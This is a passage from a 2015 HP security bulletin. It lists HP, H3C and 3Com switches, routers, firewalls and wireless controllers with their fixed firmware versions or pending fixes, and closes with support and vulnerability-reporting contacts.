HSR6800 Russian Version Fix in Progress, Use Mitigation JG361A HP HSR6802 Router Chassis, JG362A HP HSR6804 Router Chassis, JG363A HP HSR6808 Router Chassis, JG364A HP HSR6800 RSE-X2 Router MPU, JG779A HP HSR6800 RSE-X2 Router TAA MPU N/A N/A
HSR6602 Fix in Progress, Use Mitigation JG353A HP HSR6602-G Router, JG354A HP HSR6602-XG Router, JG776A HP HSR6602-G TAA Router, JG777A HP HSR6602-XG TAA Router, JG777A HP HSR6602-XG TAA Router N/A N/A
HSR6602 Russian Version Fix in Progress, Use Mitigation JG353A HP HSR6602-G Router, JG354A HP HSR6602-XG Router, JG776A HP HSR6602-G TAA Router, JG777A HP HSR6602-XG TAA Router N/A N/A
6602 Fix in Progress, Use Mitigation JC176A HP 6602 Router Chassis H3C SR6602 1U Router Host (0235A27D) N/A
6602 Russian Version Fix in Progress, Use Mitigation JC176A HP 6602 Router Chassis H3C SR6602 1U Router Host (0235A27D) N/A
A6600 Fix in Progress, Use Mitigation JC165A HP 6600 RPE-X1 Router Module, JC177A HP 6608 Router, JC177B HP A6608 Router Chassis, JC178A HP 6604 Router Chassis, JC178B HP A6604 Router Chassis, JC496A HP 6616 Router Chassis, JC566A HP A6600 RSE-X1 Main Processing Unit, JG780A HP 6600 RSE-X1 Router TAA MPU H3C RT-SR66-RPE-X1-H3 (0231A761), H3C RT-SR6608-OVS-H3 (0235A32X), H3C RT-SR6604-OVS-H3 (0235A37X), H3C SR6616 Router Chassis (0235A41D) N/A
A6600 Russian Version Fix in Progress, Use Mitigation JC165A HP 6600 RPE-X1 Router Module, JC177A HP 6608 Router, JC177B HP A6608 Router Chassis, JC178A HP 6604 Router Chassis, JC178B HP A6604 Router Chassis, JC496A HP 6616 Router Chassis, JC566A HP A6600 RSE-X1 Main Processing Unit, JG780A HP 6600 RSE-X1 Router TAA MPU H3C RT-SR66-RPE-X1-H3 (0231A761), H3C RT-SR6608-OVS-H3 (0235A32X), H3C RT-SR6604-OVS-H3 (0235A37X), H3C SR6616 Router Chassis (0235A41D) N/A
6600 MCP Fix in Progress, Use Mitigation JC177A HP 6608 Router, JC177B HP A6608 Router Chassis, JC178A HP 6604 Router Chassis, JC178B HP A6604 Router Chassis, JC496A HP 6616 Router Chassis, JG778A HP 6600 MCP-X2 Router TAA MPU. JG355A HP 6600 MCP-X1 Router MPU, JG356A HP 6600 MCP-X2 Router MPU H3C RT-SR6608-OVS-H3 (0235A32X), H3C RT-SR6604-OVS-H3 (0235A37X), H3C SR6616 Router Chassis (0235A41D) N/A
6600 MCP Russian Version Fix in Progress, Use Mitigation JC177A HP 6608 Router, JC177B HP A6608 Router Chassis, JC178A HP 6604 Router Chassis, JC178B HP A6604 Router Chassis, JC496A HP 6616 Router Chassis, JG355A HP 6600 MCP-X1 Router MPU, JG356A HP 6600 MCP-X2 Router MPU, JG776A HP HSR6602-G TAA Router, JG777A HP HSR6602-XG TAA Router, JG778A HP 6600 MCP-X2 Router TAA MPU, H3C RT-SR6608-OVS-H3 (0235A32X), H3C RT-SR6604-OVS-H3 (0235A37X), H3C SR6616 Router Chassis (0235A41D) N/A
5920 Switch Series Fix in Progress, Use Mitigation JG296A HP 5920AF-24XG Switch, JG555A HP 5920AF-24XG TAA Switch N/A N/A
5900 Switch Series Fix in Progress, Use Mitigation JC772A HP 5900AF-48XG-4QSFP+ Switch, JG336A HP 5900AF-48XGT-4QSFP+ Switch, JG510A HP 5900AF-48G-4XG-2QSFP+ Switch, JG554A HP 5900AF-48XG-4QSFP+ TAA Switch, JG838A HP FF 5900CP-48XG-4QSFP+ Switch N/A N/A
5830 Switch Series Fix in Progress, Use Mitigation JC691A HP A5830AF-48G Switch w/1 Interface Slot, JC694A HP A5830AF-96G Switch, JG316A HP 5830AF-48G TAA Switch w/1 Intf Slot, JG374A HP 5830AF-96G TAA Switch N/A N/A
5820 Switch Series Fix in Progress, Use Mitigation JC102A HP 5820-24XG-SFP+ Switch, JC106A HP 5820-14XG-SFP+ Switch with 2 Slots, JG219A HP 5820AF-24XG Switch, JG243A HP 5820-24XG-SFP+ TAA-compliant Switch, JG259A HP 5820X-14XG-SFP+ TAA Switch w 2 Slots H3C S5820X-28C 14 port (SFP Plus ) Plus 4-port BT (RJ45) Plus 2 media modules Plus OSM (0235A37L), H3C S5820X-28S 24-port 10GBASE-X (SFP Plus ) Plus 4-port 10/100/1000BASE-T (RJ45) (0235A370) N/A
5800 Switch Series Fix in Progress, Use Mitigation JC099A HP 5800-24G-PoE Switch, JC100A HP 5800-24G Switch, JC101A HP 5800-48G Switch with 2 Slots, JC103A HP 5800-24G-SFP Switch, JC104A HP 5800-48G-PoE Switch, JC105A HP 5800-48G Switch, JG225A HP 5800AF-48G Switch, JG242A HP 5800-48G-PoE+ TAA Switch w 2 Slots, JG254A HP 5800-24G-PoE+ TAA-compliant Switch, JG255A HP 5800-24G TAA-compliant Switch, JG256A HP 5800-24G-SFP TAA Switch w 1 Intf Slt, JG257A HP 5800-48G-PoE+ TAA Switch with 1 Slot, JG258A HP 5800-48G TAA Switch w 1 Intf Slot H3C S5800-32C - 24-port 1BT Plus 4-port (SFP Plus ) Plus 1 media slot (0235A36U), H3C S5800-32C-PWR - 24-port 10/100/1000BASE-T (RJ45) Plus 4-port 10GBASE-X (SFP Plus ) Plus 1 media module PoE (0235A36S), H3C S5800-32F 24-port 1000BASE-X (SFP) Plus 4-port 10GBASE-X (SFP Plus ) Plus media module (no power) (0235A374), H3C S5800-56C 48-port 10/100/1000BASE-T (RJ45) Plus 4port 10GBASE-X (SFP Plus ) Plus media module (0235A379), H3C S5800-56C-PWR 48-port BT Plus 4 port (SFP Plus ) Plus media module (0235A378), H3C S5800-60C-PWR 48-port BT Plus 4-port SFP Plus 2 media modules Plus OSM (0235A36W) N/A
5500 HI Switch Series R5501P06 JG311A HP HI 5500-24G-4SFP w/2 Intf Slts Switch, JG312A HP HI 5500-48G-4SFP w/2 Intf Slts Switch, JG541A HP 5500-24G-PoE+-4SFP HI Switch w/2 Slt, JG542A HP 5500-48G-PoE+-4SFP HI Switch w/2 Slt, JG543A HP 5500-24G-SFP HI Switch w/2 Intf Slt, JG679A HP 5500-24G-PoE+-4SFP HI TAA Swch w/2Slt, JG680A HP 5500-48G-PoE+-4SFP HI TAA Swch w/2Slt, JG681A HP 5500-24G-SFP HI TAA Swch w/2Slt N/A N/A
5500 EI Switch Series R2221P08 JD373A HP 5500-24G DC EI Switch, JD374A HP 5500-24G-SFP EI Switch, JD375A HP 5500-48G EI Switch, JD376A HP 5500-48G-PoE EI Switch, JD377A HP 5500-24G EI Switch, JD378A HP 5500-24G-PoE EI Switch, JD379A HP 5500-24G-SFP DC EI Switch, JG240A HP 5500-48G-PoE+ EI Switch w/2 Intf Slts, JG241A HP 5500-24G-PoE+ EI Switch w/2 Intf Slts, JG249A HP 5500-24G-SFP EI TAA Switch w 2 Slts, JG250A HP 5500-24G EI TAA Switch w 2 Intf Slts, JG251A HP 5500-48G EI TAA Switch w 2 Intf Slts, JG252A HP 5500-24G-PoE+ EI TAA Switch w/2 Slts, JG253A HP 5500-48G-PoE+ EI TAA Switch w/2 Slts H3C S5500-28C-EI Ethernet Switch (0235A253), H3C S5500-28F-EI Eth Switch AC Single (0235A24U), H3C S5500-52C-EI Ethernet Switch (0235A24X), H3C S5500-28C-EI-DC Ethernet Switch (0235A24S), H3C S5500-28C-PWR-EI Ethernet Switch (0235A255), H3C S5500-28F-EI Eth Swtch DC Single Pwr (0235A259), H3C S5500-52C-PWR-EI Ethernet Switch (0235A251) N/A
5500 SI Switch Series R2221P08 JD369A HP 5500-24G SI Switch, JD370A HP 5500-48G SI Switch, JD371A HP 5500-24G-PoE SI Switch, JD372A HP 5500-48G-PoE SI Switch, JG238A HP 5500-24G-PoE+ SI Switch w/2 Intf Slts, JG239A HP 5500-48G-PoE+ SI Switch w/2 Intf Slts H3C S5500-28C-SI Ethernet Switch (0235A04U), H3C S5500-52C-SI Ethernet Switch (0235A04V), H3C S5500-28C-PWR-SI Ethernet Switch (0235A05H), H3C S5500-52C-PWR-SI Ethernet Switch (0235A05J) N/A
5130 EI switch Series Fix in Progress, Use Mitigation JG932A HP 5130-24G-4SFP+ EI Switch, JG933A HP 5130-24G-SFP-4SFP+ EI Switch, JG934A HP 5130-48G-4SFP+ EI Switch, JG936A HP 5130-24G-PoE+-4SFP+ EI Swch, JG937A HP 5130-48G-PoE+-4SFP+ EI Swch, JG975A HP 5130-24G-4SFP+ EI BR Switch, JG976A HP 5130-48G-4SFP+ EI BR Switch, JG977A HP 5130-24G-PoE+-4SFP+ EI BR Swch, JG978A HP 5130-48G-PoE+-4SFP+ EI BR Swch
5120 EI Switch Series R2221P08 JE066A HP 5120-24G EI Switch, JE067A HP 5120-48G EI Switch, JE068A HP 5120-24G EI Switch with 2 Slots, JE069A HP 5120-48G EI Switch with 2 Slots, JE070A HP 5120-24G-PoE EI Switch with 2 Slots, JE071A HP 5120-48G-PoE EI Switch with 2 Slots, JG236A HP 5120-24G-PoE+ EI Switch w/2 Intf Slts, JG237A HP 5120-48G-PoE+ EI Switch w/2 Intf Slts, JG245A HP 5120-24G EI TAA Switch w 2 Intf Slts, JG246A HP 5120-48G EI TAA Switch w 2 Intf Slts, JG247A HP 5120-24G-PoE+ EI TAA Switch w 2 Slts, JG248A HP 5120-48G-PoE+ EI TAA Switch w 2 Slts H3C S5120-24P-EI 24GE Plus 4ComboSFP (0235A0BQ), H3C S5120-28C-EI 24GE Plus 4Combo Plus 2Slt (0235A0BS), H3C S5120-48P-EI 48GE Plus 4ComboSFP (0235A0BR), H3C S5120-52C-EI 48GE Plus 4Combo Plus 2Slt (0235A0BT), H3C S5120-28C-PWR-EI 24G Plus 4C Plus 2S Plus POE (0235A0BU), H3C S5120-52C-PWR-EI 48G Plus 4C Plus 2S Plus POE (0235A0BV)
5120 SI switch Series Fix in Progress, Use Mitigation JE072A HP 5120-48G SI Switch, JE073A HP 5120-16G SI Switch, JE074A HP 5120-24G SI Switch, JG091A HP 5120-24G-PoE+ (370W) SI Switch, JG092A HP 5120-24G-PoE+ (170W) SI Switch H3C S5120-52P-SI 48GE Plus 4 SFP (0235A41W), H3C S5120-20P-SI L2, 16GE Plus 4SFP (0235A42B), H3C S5120-28P-SI 24GE Plus 4 SFP (0235A42D), H3C S5120-28P-HPWR-SI (0235A0E5), H3C S5120-28P-PWR-SI (0235A0E3)
4800 G Switch Series R2221P08 JD007A HP 4800-24G Switch, JD008A HP 4800-24G-PoE Switch, JD009A HP 4800-24G-SFP Switch, JD010A HP 4800-48G Switch, JD011A HP 4800-48G-PoE Switch N/A 3Com Switch 4800G 24-Port (3CRS48G-24-91), 3Com Switch 4800G 24-Port SFP (3CRS48G-24S-91), 3Com Switch 4800G 48-Port (3CRS48G-48-91), 3Com Switch 4800G PWR 24-Port (3CRS48G-24P-91), 3Com Switch 4800G PWR 48-Port (3CRS48G-48P-91)
4510G Switch Series R2221P08 JF428A HP 4510-48G Switch, JF847A HP 4510-24G Switch N/A 3Com Switch 4510G 48 Port (3CRS45G-48-91), 3Com Switch 4510G PWR 24-Port (3CRS45G-24P-91), 3Com Switch E4510-24G (3CRS45G-24-91)
4210G Switch Series R2221P08 JF844A HP 4210-24G Switch, JF845A HP 4210-48G Switch, JF846A HP 4210-24G-PoE Switch N/A 3Com Switch 4210-24G (3CRS42G-24-91), 3Com Switch 4210-48G (3CRS42G-48-91), 3Com Switch E4210-24G-PoE (3CRS42G-24P-91)
3610 Switch Series Fix in Progress, Use Mitigation JD335A HP 3610-48 Switch, JD336A HP 3610-24-4G-SFP Switch, JD337A HP 3610-24-2G-2G-SFP Switch, JD338A HP 3610-24-SFP Switch H3C S3610-52P - model LS-3610-52P-OVS (0235A22C), H3C S3610-28P - model LS-3610-28P-OVS (0235A22D), H3C S3610-28TP - model LS-3610-28TP-OVS (0235A22E), H3C S3610-28F - model LS-3610-28F-OVS (0235A22F) N/A
3600 V2 Switch Series R2110P03 JG299A HP 3600-24 v2 EI Switch, JG300A HP 3600-48 v2 EI Switch, JG301A HP 3600-24-PoE+ v2 EI Switch, JG301B HP 3600-24-PoE+ v2 EI Switch, JG302A HP 3600-48-PoE+ v2 EI Switch, JG302B HP 3600-48-PoE+ v2 EI Switch, JG303A HP 3600-24-SFP v2 EI Switch, JG304A HP 3600-24 v2 SI Switch, JG305A HP 3600-48 v2 SI Switch, JG306A HP 3600-24-PoE+ v2 SI Switch, JG306B HP 3600-24-PoE+ v2 SI Switch, JG307A HP 3600-48-PoE+ v2 SI Switch, JG307B HP 3600-48-PoE+ v2 SI Switch N/A N/A
3100V2 R5203P11 JD313B HP 3100-24-PoE v2 EI Switch, JD318B HP 3100-8 v2 EI Switch, JD319B HP 3100-16 v2 EI Switch, JD320B HP 3100-24 v2 EI Switch, JG221A HP 3100-8 v2 SI Switch, JG222A HP 3100-16 v2 SI Switch, JG223A HP 3100-24 v2 SI Switch N/A N/A
3100V2-48 R2110P03 JG315A HP 3100-48 v2 Switch N/A N/A
1920 Fix in Progress, Use Mitigation JG920A HP 1920-8G Switch, JG921A HP 1920-8G-PoE+ (65W) Switch, JG922A HP 1920-8G-PoE+ (180W) Switch, JG923A HP 1920-16G Switch, JG924A HP 1920-24G Switch, JG925A HP 1920-24G-PoE+ (180W) Switch, JG926A HP 1920-24G-PoE+ (370W) Switch, JG927A HP 1920-48G Switch
1910 R11 Fix in Progress, Use Mitigation JG536A HP 1910-8 Switch, JG537A HP 1910-8 -PoE+ Switch, JG538A HP 1910-24 Switch, JG539A HP 1910-24-PoE+ Switch, JG540A HP 1910-48 Switch N/A N/A
1910 R15 Fix in Progress, Use Mitigation JE005A HP 1910-16G Switch, JE006A HP 1910-24G Switch, JE007A HP 1910-24G-PoE (365W) Switch, JE008A HP 1910-24G-PoE(170W) Switch, JE009A HP 1910-48G Switch, JG348A HP 1910-8G Switch, JG349A HP 1910-8G-PoE+ (65W) Switch, JG350A HP 1910-8G-PoE+ (180W) Switch N/A N/A
1620 Fix in Progress, Use Mitigation JG912A HP 1620-8G Switch, JG913A HP 1620-24G Switch, JG914A HP 1620-48G Switch N/A N/A
MSR20-1X Fix in Progress, Use Mitigation JD431A HP MSR20-10 Router, JD667A HP MSR20-15 IW Multi-Service Router, JD668A HP MSR20-13 Multi-Service Router, JD669A HP MSR20-13 W Multi-Service Router, JD670A HP MSR20-15 A Multi-Service Router, JD671A HP MSR20-15 AW Multi-Service Router, JD672A HP MSR20-15 I Multi-Service Router, JD673A HP MSR20-11 Multi-Service Router, JD674A HP MSR20-12 Multi-Service Router, JD675A HP MSR20-12 W Multi-Service Router, JD676A HP MSR20-12 T1 Multi-Service Router, JF236A HP MSR20-15-I Router,JF237A HP MSR20-15-A Router, JF238A HP MSR20-15-I-W Router,JF239A HP MSR20-11 Router, JF240A HP MSR20-13 Router,JF241A HP MSR20-12 Router, JF806A HP MSR20-12-T Router,JF807A HP MSR20-12-W Router, JF808A HP MSR20-13-W Router,JF809A HP MSR20-15-A-W Router, JF817A HP MSR20-15 Router,JG209A HP MSR20-12-T-W Router (NA), JG210A HP MSR20-13-W Router (NA) H3C MSR 20-15 Router Host(AC) 1 FE 4 LSW 1 ADSLoPOTS 1 DSIC (0235A0A8), H3C MSR 20-10 (0235A0A7),H3C RT-MSR2011-AC-OVS-H3 (0235A395), H3C RT-MSR2012-AC-OVS-H3 (0235A396),H3C RT-MSR2012-AC-OVS-W-H3 (0235A397), H3C RT-MSR2012-T-AC-OVS-H3 (0235A398),H3C RT-MSR2013-AC-OVS-H3 (0235A390), H3C RT-MSR2013-AC-OVS-W-H3 (0235A391),H3C RT-MSR2015-AC-OVS-A-H3 (0235A392), H3C RT-MSR2015-AC-OVS-AW-H3 (0235A393),H3C RT-MSR2015-AC-OVS-I-H3 (0235A394), H3C RT-MSR2015-AC-OVS-IW-H3 (0235A38V),H3C MSR 20-11 (0235A31V), H3C MSR 20-12 (0235A32E),H3C MSR 20-12 T1 (0235A32B),H3C MSR 20-13 (0235A31W) , H3C MSR 20-13 W (0235A31X),H3C MSR 20-15 A (0235A31Q), H3C MSR 20-15 A W (0235A31R),H3C MSR 20-15 I (0235A31N), H3C MSR 20-15 IW (0235A31P),H3C MSR20-12 W (0235A32G) N/A
MSR30 Fix in Progress, Use Mitigation JD654A HP MSR30-60 POE Multi-Service Router, JD657A HP MSR30-40 Multi-Service Router, JD658A HP MSR30-60 Multi-Service Router, JD660A HP MSR30-20 POE Multi-Service Router, JD661A HP MSR30-40 POE Multi-Service Router, JD666A HP MSR30-20 Multi-Service Router, JF229A HP MSR30-40 Router,JF230A HP MSR30-60 Router, JF232A HP RT-MSR3040-AC-OVS-AS-H3, JF235A HP MSR30-20 DC Router,JF284A HP MSR30-20 Router, JF287A HP MSR30-40 DC Router,JF801A HP MSR30-60 DC Router, JF802A HP MSR30-20 PoE Router,JF803A HP MSR30-40 PoE Router, JF804A HP MSR30-60 PoE Router H3C MSR 30-20 Router (0235A328),H3C MSR 30-40 Router Host(DC) (0235A268), H3C RT-MSR3020-AC-POE-OVS-H3 (0235A322),H3C RT-MSR3020-DC-OVS-H3 (0235A267), H3C RT-MSR3040-AC-OVS-H (0235A299),H3C RT-MSR3040-AC-POE-OVS-H3 (0235A323), H3C RT-MSR3060-AC-OVS-H3 (0235A320),H3C RT-MSR3060-AC-POE-OVS-H3 (0235A296), H3C RT-MSR3060-DC-OVS-H3 (0235A269),H3C MSR 30-20 RTVZ33020AS Router Host(AC) (0235A20S), H3C MSR 30-20 (0235A19L),H3C MSR 30-20 POE (0235A239), H3C MSR 30-40 (0235A20J),H3C MSR 30-40 POE (0235A25R), H3C MSR 30-60 (0235A20K),H3C MSR 30-60 POE (0235A25S), H3C RT-MSR3040-AC-OVS-AS-H3 (0235A20V) N/A
MSR30-16 Fix in Progress, Use Mitigation JD659A HP MSR30-16 POE Multi-Service Router, JD665A HP MSR30-16 Multi-Service Router, JF233A HP MSR30-16 Router, JF234A HP MSR30-16 PoE Router H3C RT-MSR3016-AC-OVS-H3 (0235A327), H3C RT-MSR3016-AC-POE-OVS-H3 (0235A321), H3C MSR 30-16 (0235A237), H3C MSR 30-16 POE (0235A238) N/A
MSR30-1X Fix in Progress, Use Mitigation JF800A HP MSR30-11 Router, JF816A HP MSR30-10 2 FE /2 SIC /1 MIM MS Rtr, JG182A HP MSR30-11E Router, JG183A HP MSR30-11F Router, JG184A HP MSR30-10 DC Router H3C MSR 30-10 Router Host(AC) 2FE 2SIC 1XMIM 256DDR (0235A39H), H3C RT-MSR3011-AC-OVS-H3 (0235A29L) N/A
MSR50 Fix in Progress, Use Mitigation JD433A HP MSR50-40 Router, JD653A HP MSR50 Processor Module, JD655A HP MSR50-40 Multi-Service Router, JD656A HP MSR50-60 Multi-Service Router, JF231A HP MSR50-60 Router, JF285A HP MSR50-40 DC Router, JF640A HP MSR50-60 Rtr Chassis w DC PwrSupply H3C MSR 50-40 Router (0235A297), H3C MSR5040-DC-OVS-H3C (0235A20P), H3C RT-MSR5060-AC-OVS-H3 (0235A298), H3C MSR 50-40 Chassis (0235A20N), H3C MSR 50-60 Chassis (0235A20L) N/A
MSR50-G2 Fix in Progress, Use Mitigation JD429A HP MSR50 G2 Processor Module, JD429B HP MSR50 G2 Processor Module H3C H3C MSR 50 Processor Module-G2 (0231A84Q), H3C MSR 50 High Performance Main Processing Unit 3GE (Combo) 256F/1GD(0231A0KL) N/A
MSR20 Russian version Fix in Progress, Use Mitigation JD663B HP MSR20-21 Router, JF228A HP MSR20-40 Router, JF283A HP MSR20-20 Router H3C RT-MSR2020-AC-OVS-H3C (0235A324), H3C RT-MSR2040-AC-OVS-H3 (0235A326) N/A
MSR20-1X Russian version Fix in Progress, Use Mitigation JD431A HP MSR20-10 Router, JF236A HP MSR20-15-I Router, JF237A HP MSR20-15-A Router, JF238A HP MSR20-15-I-W Router, JF239A HP MSR20-11 Router, JF240A HP MSR20-13 Router, JF241A HP MSR20-12 Router, JF806A HP MSR20-12-T Router, JF807A HP MSR20-12-W Router, JF808A HP MSR20-13-W Router, JF809A HP MSR20-15-A-W Router, JF817A HP MSR20-15 Router H3C MSR 20-10 (0235A0A7), H3C RT-MSR2015-AC-OVS-I-H3 (0235A394), H3C RT-MSR2015-AC-OVS-A-H3 (0235A392), H3C RT-MSR2015-AC-OVS-AW-H3 (0235A393), H3C RT-MSR2011-AC-OVS-H3 (0235A395),H3C RT-MSR2013-AC-OVS-H3 (0235A390), H3C RT-MSR2012-AC-OVS-H3 (0235A396), H3C RT-MSR2012-T-AC-OVS-H3 (0235A398), H3C RT-MSR2012-AC-OVS-W-H3 (0235A397), H3C RT-MSR2013-AC-OVS-W-H3 (0235A391), H3C RT-MSR2015-AC-OVS-IW-H3 (0235A38V), H3C MSR 20-15 Router Host(AC) 1 FE 4 LSW 1 ADSLoPOTS 1 DSIC (0235A0A8) N/A
MSR30 Russian version Fix in Progress, Use Mitigation JF229A HP MSR30-40 Router, JF230A HP MSR30-60 Router, JF235A HP MSR30-20 DC Router, JF284A HP MSR30-20 Router, JF287A HP MSR30-40 DC Router, JF801A HP MSR30-60 DC Router, JF802A HP MSR30-20 PoE Router, JF803A HP MSR30-40 PoE Router, JF804A HP MSR30-60 PoE Router H3C RT-MSR3040-AC-OVS-H (0235A299), H3C RT-MSR3060-AC-OVS-H3 (0235A320), H3C RT-MSR3020-DC-OVS-H3 (0235A267), H3C MSR 30-20 Router (0235A328), H3C MSR 30-40 Router Host(DC) (0235A268), H3C RT-MSR3060-DC-OVS-H3 (0235A269), H3C RT-MSR3020-AC-POE-OVS-H3 (0235A322), H3C RT-MSR3040-AC-POE-OVS-H3 (0235A323), H3C RT-MSR3060-AC-POE-OVS-H3 (0235A296) N/A
MSR30-16 Russian version Fix in Progress, Use Mitigation JF233A HP MSR30-16 Router, JF234A HP MSR30-16 PoE Router H3C RT-MSR3016-AC-OVS-H3 (0235A327), H3C RT-MSR3016-AC-POE-OVS-H3 (0235A321) N/A
MSR30-1X Russian version Fix in Progress, Use Mitigation JF800A HP MSR30-11 Router, JF816A HP MSR30-10 2 FE /2 SIC /1 MIM MS Rtr, JG182A HP MSR30-11E Router, JG183A HP MSR30-11F Router, JG184A HP MSR30-10 DC Router H3C RT-MSR3011-AC-OVS-H3 (0235A29L), H3C MSR 30-10 Router Host(AC) 2FE 2SIC 1XMIM 256DDR (0235A39H) N/A
MSR50 Russian version Fix in Progress, Use Mitigation JD433A HP MSR50-40 Router, JD653A HP MSR50 Processor Module, JD655A HP MSR50-40 Multi-Service Router, JD656A HP MSR50-60 Multi-Service Router, JF231A HP MSR50-60 Router, JF285A HP MSR50-40 DC Router, JF640A HP MSR50-60 Rtr Chassis w DC PwrSupply H3C MSR 50-40 Router (0235A297), H3C MSR 50 Processor Module (0231A791), H3C MSR 50-40 Chassis (0235A20N), H3C MSR 50-60 Chassis (0235A20L), H3C RT-MSR5060-AC-OVS-H3 (0235A298), H3C MSR5040-DC-OVS-H3C (0235A20P) N/A
MSR50 G2 Russian version Fix in Progress, Use Mitigation JD429B HP MSR50 G2 Processor Module H3C MSR 50 High Performance Main Processing Unit 3GE (Combo) 256F/1GD (0231A0KL) N/A
MSR9XX Fix in Progress, Use Mitigation JF812A HP MSR900 Router, JF813A HP MSR920 Router, JF814A HP MSR900-W Router, JF815A HP MSR920 2FEWAN/8FELAN/.11b/g Rtr, JG207A HP MSR900-W Router (NA), JG208A HP MSR920-W Router (NA) H3C MSR 900 Router with 802.11b/g 2 FE WAN 4 FE LAN 256DDR 802.11b (0235A0C2), H3C MSR 900 Router 2 FE WAN 4 FE LAN 256DDR (0235A0BX), H3C MSR 920 Router with 802.11b/g 2 FE WAN 8 FE LAN 256DDR (0235A0C4), H3C MSR 920 Router 2 FE WAN 8 FE LAN 256DDR (0235A0C0) N/A
MSR93X Fix in Progress, Use Mitigation JG512A HP MSR930 Wireless Router , JG513A HP MSR930 3G Router, JG514A HP MSR931 Router, JG515A HP MSR931 3G Router, JG516A HP MSR933 Router, JG517A HP MSR933 3G Router, JG518A HP MSR935 Router, JG519A HP MSR935 Wireless Router, JG520A HP MSR935 3G Router, JG531A HP MSR931 Dual 3G Router, JG596A HP MSR930 4G LTE/3G CDMA Router, JG597A HP MSR936 Wireless Router, JG665A HP MSR930 4G LTE/3G WCDMA Global Router, JG704A HP MSR930 4G LTE/3G WCDMA ATT Router N/A N/A
MSR1000 Fix in Progress, Use Mitigation JG732A HP MSR1003-8 AC Router N/A N/A
MSR1000 Russian version Fix in Progress, Use Mitigation JG732A HP MSR1003-8 AC Router N/A N/A
MSR2000 Fix in Progress, Use Mitigation JG411A HP MSR2003 AC Router N/A N/A
MSR3000 Fix in Progress, Use Mitigation JG404A HP MSR3064 Router, JG405A HP MSR3044 Router, JG406A HP MSR3024 AC Router, JG409A HP MSR3012 AC Router, JG861A HP MSR3024 TAA-compliant AC Router N/A N/A
MSR4000 Fix in Progress, Use Mitigation JG402A HP MSR4080 Router Chassis, JG403A HP MSR4060 Router Chassis, JG412A HP MSR4000 MPU-100 Main Processing Unit N/A N/A
F5000 Fix in Progress, Use Mitigation JG216A HP F5000 Firewall Standalone Chassis, JD259A HP A5000-A5 VPN Firewall Chassis H3C SecPath F5000-A5 Host System (0150A0AG) N/A
F5000 C R3811P03 JG650A HP F5000-C VPN Firewall Appliance N/A N/A
F5000 S R3811P03 JG370A HP F5000-S VPN Firewall Appliance N/A N/A
U200S and CS Fix in Progress, Use Mitigation JD268A HP 200-CS UTM Appliance, JD273A HP U200-S UTM Appliance H3C SecPath U200-S (0235A36N) N/A
U200A and M Fix in Progress, Use Mitigation JD274A HP 200-M UTM Appliance, JD275A HP U200-A UTM Appliance H3C SecPath U200-A (0235A36Q) N/A
SecBlade III R3820P03 JG371A HP 12500 20Gbps VPN Firewall Module, JG372A HP 10500/11900/7500 20Gbps VPN FW Mod N/A N/A
SecBlade FW R3181P05 JC635A HP 12500 VPN Firewall Module, JD245A HP 9500 VPN Firewall Module, JD249A HP 10500/7500 Advanced VPN Firewall Mod, JD250A HP 6600 Firewall Processing Rtr Module, JD251A HP 8800 Firewall Processing Module, JD255A HP 5820 VPN Firewall Module H3C S9500E SecBlade VPN Firewall Module (0231A0AV), H3C S7500E SecBlade VPN Firewall Module (0231A832), H3C SR66 Gigabit Firewall Module (0231A88A), H3C SR88 Firewall Processing Module (0231A88L), H3C S5820 SecBlade VPN Firewall Module (0231A94J) N/A
F1000E R3181P05 JD272A HP F1000-E VPN Firewall Appliance
F1000-A R3734P06 JG214A HP F1000-A-EI VPN Firewall Appliance
F1000-S R3734P06 JG213A HP F1000-S-EI VPN Firewall Appliance
VSR1000 Fix in Progress, Use Mitigation JG810AAE HP VSR1001 Virtual Services Router 60 Day Evaluation Software, JG811AAE HP VSR1001 Comware 7 Virtual Services Router, JG812AAE HP VSR1004 Comware 7 Virtual Services Router, JG813AAE HP VSR1008 Comware 7 Virtual Services Router N/A N/A
WX5002/5004 Fix in Progress, Use Mitigation JD441A HP 5800 ACM for 64-256 APs, JD447B HP WX5002 Access Controller, JD448A HP A-WX5004 Access Controller, JD448B HP WX5004 Access Controller, JD469A HP A-WX5004 (3Com) Access Controller, JG261A HP 5800 Access Controller OAA TAA Mod N/A N/A
HP 850/870 Fix in Progress, Use Mitigation JG723A HP 870 Unified Wired-WLAN Appliance, JG725A HP 870 Unifd Wrd-WLAN TAA Applnc, JG722A HP 850 Unified Wired-WLAN Appliance, JG724A HP 850 Unifd Wrd-WLAN TAA Applnc N/A N/A
HP 830 Fix in Progress, Use Mitigation JG640A HP 830 24P PoE+ Unifd Wired-WLAN Swch, JG641A HP 830 8P PoE+ Unifd Wired-WLAN Swch, JG646A HP 830 24-Port PoE+ Wrd-WLAN TAA Switch, JG647A HP 830 8-Port PoE+ Wrd-WLAN TAA Switch N/A N/A
HP 6000 Fix in Progress, Use Mitigation JG639A HP 10500/7500 20G Unified Wired-WLAN Mod, JG645A HP 10500/7500 20G Unifd Wrd-WLAN TAA Mod N/A N/A
VCX Fix in Progress, Use Mitigation J9672A HP VCX V7205 Platform w/ DL360 G7 Srvr, J9668A HP VCX IPC V7005 Pltfrm w/ DL120 G6 Srvr, JC517A HP VCX V7205 Platform w/DL 360 G6 Server, JE355A HP VCX V6000 Branch Platform 9.0, JC516A HP VCX V7005 Platform w/DL 120 G6 Server, JC518A HP VCX Connect 200 Primry 120 G6 Server, J9669A HP VCX IPC V7310 Pltfrm w/ DL360 G7 Srvr, JE341A HP VCX Connect 100 Secondary, JE252A HP VCX Connect Primary MIM Module, JE253A HP VCX Connect Secondary MIM Module, JE254A HP VCX Branch MIM Module, JE355A HP VCX V6000 Branch Platform 9.0, JD028A HP MS30-40 RTR w/VCX + T1/FXO/FXS/Mod, JD023A HP MSR30-40 Router with VCX MIM Module, JD024A HP MSR30-16 RTR w/VCX Ent Br Com MIM, JD025A HP MSR30-16 RTR w/VCX + 4FXO/2FXS Mod, JD026A HP MSR30-16 RTR w/VCX + 8FXO/4FXS Mod, JD027A HP MSR30-16 RTR w/VCX + 8BRI/4FXS Mod, JD029A HP MSR30-16 RTR w/VCX + E1/4BRI/4FXS, JE340A HP VCX Connect 100 Pri Server 9.0, JE342A HP VCX Connect 100 Sec Server 9.0 N/A N/A
HISTORY Version:1 (rev.1) - 18 February 2015 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
